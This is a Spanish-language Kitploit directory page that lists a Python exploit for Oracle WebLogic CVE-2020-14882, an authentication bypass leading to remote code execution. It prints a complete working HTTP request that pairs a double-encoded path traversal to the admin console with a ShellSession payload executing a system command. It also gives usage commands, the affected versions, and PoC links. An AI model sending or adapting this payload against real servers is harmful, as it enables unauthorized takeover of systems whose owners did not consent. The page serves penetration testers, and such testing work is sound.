Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Weblogic_Unauthorized-bypass-RCE — Script de exploit basado en Python para Oracle WebLogic CVE-2020-14882, bypass de autenticación no autorizado y RCE. Prueba el bypass de autenticación y la ejecución remota de código mediante solicitudes HTTP manipuladas al portal de consola. | Kitploit
Herramientas/GitHubGitHub/ludy-dev/weblogic_unauthorized-bypass-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubludy-dev/weblogic_unauthorized-bypass-rce

Weblogic_Unauthorized-bypass-RCE

Script de exploit basado en Python para Oracle WebLogic CVE-2020-14882, bypass de autenticación no autorizado y RCE. Prueba el bypass de autenticación y la ejecución remota de código mediante solicitudes HTTP manipuladas al portal de consola.

Ver Repositorio
811hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

(CVE-2020–14882) Bypass no autorizado RCE de Weblogic

(CVE-2020-14882) Script de prueba de bypass no autorizado RCE de Oracle Weblogic Funciona en Python3

Solicitudes

root@kitploit:~
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");

El script de prueba verifica los datos de respuesta con pcre.

Uso

root@kitploit:~
- 7001/tcp (puerto predeterminado de WebLogic) 
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP>

- puerto específico/tcp 
Oracle Weblogic Auth Bypass RCE(CVE-2020–14882).py <Target IP> <port>

Versiones afectadas

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

PoC

https://github.com/jas502n/CVE-2020-14882

referencia

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf https://www.tenable.com/blog/cve-2020-14882-oracle-weblogic-remote-code-execution-vulnerability-exploited-in-the-wild

Descargar herramienta